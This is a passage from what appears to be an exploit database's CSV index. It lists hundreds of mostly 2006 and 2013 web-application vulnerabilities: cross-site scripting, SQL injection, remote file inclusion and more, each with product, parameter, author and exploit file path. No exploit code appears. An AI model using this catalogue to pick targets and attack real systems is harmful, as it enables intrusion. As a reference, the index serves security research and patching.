'online.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28071,exploits/php/webapps/28071.txt,"V3 Chat Instant Messenger - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-20,Luny,php,webapps, -28072,exploits/php/webapps/28072.txt,"V3 Chat Instant Messenger - 'profile.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28073,exploits/php/webapps/28073.txt,"V3 Chat Instant Messenger - 'profileview.php?membername' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28074,exploits/php/webapps/28074.txt,"V3 Chat Instant Messenger - 'expire.php?cust_name' Cross-Site Scripting",2006-06-20,Luny,php,webapps, -28075,exploits/php/webapps/28075.txt,"V3 Chat Instant Messenger - 'mycontacts.php' membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps, -28076,exploits/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - 'member.php' Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps, -28078,exploits/php/webapps/28078.txt,"e107 0.7.5 - 'Subject' HTML Injection",2006-06-21,"EllipSiS Security",php,webapps, -28086,exploits/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - 'Error_msg' Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps, -28088,exploits/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps, -28089,exploits/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'newthread.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps, -28090,exploits/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'report.php?postid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps, -28091,exploits/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - 'showmods.php?boardid' SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps, -28092,exploits/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps, -28093,exploits/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps, -28094,exploits/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps, -28095,exploits/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps, -28096,exploits/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps, -28097,exploits/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps, -28098,exploits/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusions",2006-06-22,Shm,php,webapps, -28101,exploits/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps, -28102,exploits/php/webapps/28102.txt,"Winged Gallery 1.0 - 'Thumb.php' Cross-Site Scripting",2006-06-24,Luny,php,webapps, -28104,exploits/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps, -28105,exploits/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,php,webapps, -28106,exploits/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusions",2006-06-16,Kw3[R]Ln,php,webapps, -28107,exploits/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps, -28108,exploits/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps, -28109,exploits/php/webapps/28109.txt,"Usenet 0.5 - 'index.php' Cross-Site Scripting",2006-06-23,Luny,php,webapps, -28110,exploits/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps, -28111,exploits/php/webapps/28111.txt,"OpenGuestbook 0.5 - 'header.php?title' Cross-Site Scripting",2006-06-26,simo64,php,webapps, -28112,exploits/php/webapps/28112.txt,"OpenGuestbook 0.5 - 'view.php?offset' SQL Injection",2006-06-26,simo64,php,webapps, -28113,exploits/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps, -28114,exploits/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps, -28115,exploits/php/webapps/28115.txt,"MF Piadas 1.0 - 'admin.php' Cross-Site Scripting",2006-06-27,botan,php,webapps, -28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps, -28117,exploits/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,php,webapps, -28119,exploits/php/webapps/28119.txt,"vCard PRO - 'gbrowse.php?cat_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps, -28120,exploits/php/webapps/28120.txt,"vCard PRO - 'rating.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps, -28121,exploits/php/webapps/28121.txt,"vCard PRO - 'create.php?card_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps, -28122,exploits/php/webapps/28122.txt,"vCard PRO - 'search.php?event_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps, -28124,exploits/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps, -28125,exploits/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps, -28126,exploits/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php?value' SQL Injection",2013-09-06,"Easy Laster",php,webapps, -28129,exploits/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps, -28131,exploits/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps, -28132,exploits/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-29,securityconnection,php,webapps, -28133,exploits/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple SQL Injections",2006-06-29,securityconnection,php,webapps, -28134,exploits/php/webapps/28134.txt,"newsPHP 2006 PRO - '/inc/rss_feed.php?category' SQL Injection",2006-06-29,securityconnection,php,webapps, -28136,exploits/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - 'Diver.php' SQL Injection",2006-06-23,DarkFig,php,webapps, -28137,exploits/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps, -28138,exploits/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps, -28139,exploits/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps, -28140,exploits/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps, -28141,exploits/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,php,webapps, -28142,exploits/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps, -28143,exploits/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps, -28146,exploits/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps, -28147,exploits/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps, -28148,exploits/php/webapps/28148.txt,"Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps, -28149,exploits/php/webapps/28149.txt,"Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28150,exploits/php/webapps/28150.txt,"free QBoard 1.1 - 'index.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28151,exploits/php/webapps/28151.txt,"free QBoard 1.1 - 'about.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28152,exploits/php/webapps/28152.txt,"free QBoard 1.1 - 'contact.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28153,exploits/php/webapps/28153.txt,"free QBoard 1.1 - 'delete.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28154,exploits/php/webapps/28154.txt,"free QBoard 1.1 - 'faq.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28155,exploits/php/webapps/28155.txt,"free QBoard 1.1 - 'features.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28156,exploits/php/webapps/28156.txt,"free QBoard 1.1 - 'history.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,php,webapps, -28157,exploits/php/webapps/28157.txt,"VirtuaStore 2.0 - 'Password' SQL Injection",2006-07-03,supermalhacao,php,webapps, -28158,exploits/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps, -28159,exploits/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps, -28161,exploits/php/webapps/28161.txt,"PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting",2006-07-04,iss4m,php,webapps, -28162,exploits/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,php,webapps, -28163,exploits/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps, -28166,exploits/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php?Date' SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps, -28167,exploits/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",php,webapps, -28168,exploits/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",php,webapps, -28171,exploits/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",php,webapps, -28273,exploits/php/webapps/28273.txt,"PHPSavant Savant2 - 'Stylesheet.php?MosConfig_absolute_path' Remote File Inclusion",2006-07-25,botan,php,webapps, -28174,exploits/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps, -28175,exploits/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps, -28176,exploits/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-06,"Security News",php,webapps, -28177,exploits/php/webapps/28177.txt,"ATutor 1.5.x - '/documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps, -28178,exploits/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php?forgot' Cross-Site Scripting",2006-07-06,"Security News",php,webapps, -28179,exploits/php/webapps/28179.txt,"ATutor 1.5.x - '/users/browse.php?cat' Cross-Site Scripting",2006-07-06,"Security News",php,webapps, -28180,exploits/php/webapps/28180.txt,"ATutor 1.5.x - '/admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",php,webapps, -28184,exploits/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps, -28185,exploits/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php?cat_id' SQL Injection",2013-09-10,"Omar Kurt",php,webapps, -28190,exploits/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps, -28191,exploits/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps, -28192,exploits/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps, -28193,exploits/asp/webapps/28193.txt,"Webvizyon - 'SayfalaAltList.asp' SQL Injection",2006-07-08,StorMBoY,asp,webapps, -28195,exploits/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps, -28199,exploits/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions",2006-07-09,h4ntu,php,webapps, -28200,exploits/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps, -28201,exploits/php/webapps/28201.txt,"Graffiti Forums 1.0 - 'Topics.php' SQL Injection",2006-07-10,Paisterist,php,webapps, -28203,exploits/asp/webapps/28203.txt,"Hosting Controller 1.x - 'error.asp' Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps, -28204,exploits/php/webapps/28204.txt,"SaPHPLesson 2.0 - 'add.php' SQL Injection",2006-07-11,C.B.B.L,php,webapps, -28205,exploits/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps, -28206,exploits/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - 'Guestbook.php' HTML Injection",2006-07-11,omnipresent,php,webapps, -28208,exploits/asp/webapps/28208.txt,"FlexWATCH 3.0 - 'AIndex.asp' Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps, -28211,exploits/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - 'codes-english.php?show' Cross-Site Scripting",2006-07-12,simo64,php,webapps, -28212,exploits/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - 'picture.php?img' Cross-Site Scripting",2006-07-12,simo64,php,webapps, -28214,exploits/php/webapps/28214.txt,"PhotoCycle 1.0 - 'PhotoCycle.php' Cross-Site Scripting",2006-07-13,Luny,php,webapps, -28215,exploits/php/webapps/28215.txt,"PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion",2006-07-13,Solpot,php,webapps, -28216,exploits/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps, -28217,exploits/php/webapps/28217.txt,"Forum 5 - 'pm.php' Local File Inclusion",2006-07-13,rgod,php,webapps, -28219,exploits/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' SQL Injection",2006-07-13,"Evampire chiristof",php,webapps, -28223,exploits/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps, -28229,exploits/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusions",2006-07-17,"Tan Chew Keong",php,webapps, -28231,exploits/php/webapps/28231.txt,"ListMessenger 0.9.3 - 'LM_Path' Remote File Inclusion",2006-07-17,xoron,php,webapps, -28233,exploits/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,php,webapps, -28236,exploits/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps, -28238,exploits/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps, -28239,exploits/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps, -28243,exploits/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps, -28247,exploits/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps, -28248,exploits/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps, -28249,exploits/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php?d' SQL Injection",2006-07-20,LBDT,php,webapps, -28250,exploits/php/webapps/28250.txt,"Geodesic Solutions (Multiple Products) - 'index.php?b' SQL Injection",2006-07-20,LBDT,php,webapps, -28251,exploits/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps, -28253,exploits/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps, -28255,exploits/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps, -28260,exploits/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps, -28261,exploits/php/webapps/28261.txt,"RadScripts - 'a_editpage.php?Filename' Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps, -28262,exploits/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' SQL Injection",2006-07-24,"EllipSiS Security",php,webapps, -28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps, -28267,exploits/php/webapps/28267.txt,"LinksCaffe 3.0 - 'links.php' Multiple SQL Injections",2006-07-25,simo64,php,webapps, -28268,exploits/php/webapps/28268.txt,"LinksCaffe 3.0 - 'counter.php?tablewidth' Cross-Site Scripting",2006-07-25,simo64,php,webapps, -28269,exploits/php/webapps/28269.txt,"LinksCaffe 3.0 - 'links.php?newdays' Cross-Site Scripting",2006-07-25,simo64,php,webapps, -28270,exploits/php/webapps/28270.txt,"LinksCaffe 3.0 - 'menu.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-25,simo64,php,webapps, -28272,exploits/php/webapps/28272.txt,"Zimplit CMS 3.0 - Multiple Vulnerabilities",2013-09-13,"Yashar shahinzadeh",php,webapps, -28274,exploits/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting",2006-07-25,"EllipSiS Security",php,webapps, -28275,exploits/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 - 'viewfeedback.php' Multiple SQL Injections",2006-07-25,"EllipSiS Security",php,webapps, -28276,exploits/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - 'categories.php?orderType' SQL Injection",2006-07-25,"EllipSiS Security",php,webapps, -28278,exploits/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps, -28279,exploits/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",hardware,webapps, -28280,exploits/php/webapps/28280.txt,"wwwThreads - 'calendar.php' Cross-Site Scripting",2006-07-26,l2odon,php,webapps, -28281,exploits/php/webapps/28281.txt,"phpBB-Auction 1.x - 'auction_room.php?ar' SQL Injection",2006-07-26,l2odon,php,webapps, -28282,exploits/php/webapps/28282.txt,"phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection",2006-07-26,l2odon,php,webapps, -28283,exploits/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps, -28289,exploits/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps, -28291,exploits/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps, -28292,exploits/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps, -28294,exploits/php/webapps/28294.txt,"PHP-Nuke - 'INP modules.php' Cross-Site Scripting",2006-07-28,l2odon,php,webapps, -28295,exploits/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps, -28296,exploits/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps, -28297,exploits/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps, -28302,exploits/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps, -28303,exploits/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - 'Protect.php' SQL Injection",2006-07-29,SirDarckCat,php,webapps, -28304,exploits/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - 'top.php' SQL Injection",2006-07-29,SirDarckCat,php,webapps, -28305,exploits/php/webapps/28305.txt,"Ajax Chat 0.1 - 'operator_chattranscript.php?chatid' Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps, -28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,php,webapps, -28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,php,webapps, -28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps, -28309,exploits/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps, -28310,exploits/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,php,webapps, -28311,exploits/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps, -28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,php,webapps, -28316,exploits/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps, -28317,exploits/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps, -28318,exploits/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps, -28319,exploits/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps, -28320,exploits/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - 'GB_PATH' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps, -28321,exploits/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - 'preview_email.cgi?file' Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps, -28322,exploits/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,php,webapps, -28323,exploits/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,php,webapps, -28324,exploits/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps, -28326,exploits/php/webapps/28326.txt,"VWar 1.x - 'war.php?page' Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps, -28327,exploits/php/webapps/28327.txt,"VWar 1.x - 'war.php' Multiple SQL Injections",2006-08-03,mfoxhacker,php,webapps, -28329,exploits/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps, -28330,exploits/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps, -28339,exploits/asp/webapps/28339.txt,"Anychart 3.0 - 'Password' SQL Injection",2006-08-03,sCORPINo,asp,webapps, -28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps, -28342,exploits/php/webapps/28342.txt,"vBulletin 3.0.14 - 'global.php' Encoded Cross-Site Scripting",2006-08-05,imei,php,webapps, -28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps, -28347,exploits/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps, -28349,exploits/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusions",2006-08-07,Matdhule,php,webapps, -28350,exploits/php/webapps/28350.txt,"VWar 1.5 - 'war.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28351,exploits/php/webapps/28351.txt,"VWar 1.5 - 'member.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28352,exploits/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28353,exploits/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28354,exploits/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28355,exploits/php/webapps/28355.txt,"VWar 1.5 - 'news.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28356,exploits/php/webapps/28356.txt,"VWar 1.5 - 'stats.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps, -28359,exploits/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps, -28362,exploits/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps, -28363,exploits/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps, -28364,exploits/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",php,webapps, -28366,exploits/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Remote File Inclusion",2006-06-02,sh3ll,php,webapps, -28370,exploits/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps, -28371,exploits/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps, -28372,exploits/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - 'Image' Multiple Remote File Inclusions",2006-08-10,x0r0n,php,webapps, -28377,exploits/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps, -28378,exploits/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps, -28379,exploits/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps, -28382,exploits/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - 'edit.php' Directory Traversal",2006-08-14,"marc & shb",php,webapps, -28385,exploits/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps, -28388,exploits/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps, -28390,exploits/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusions",2006-08-15,Crackers_Child,php,webapps, -28392,exploits/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 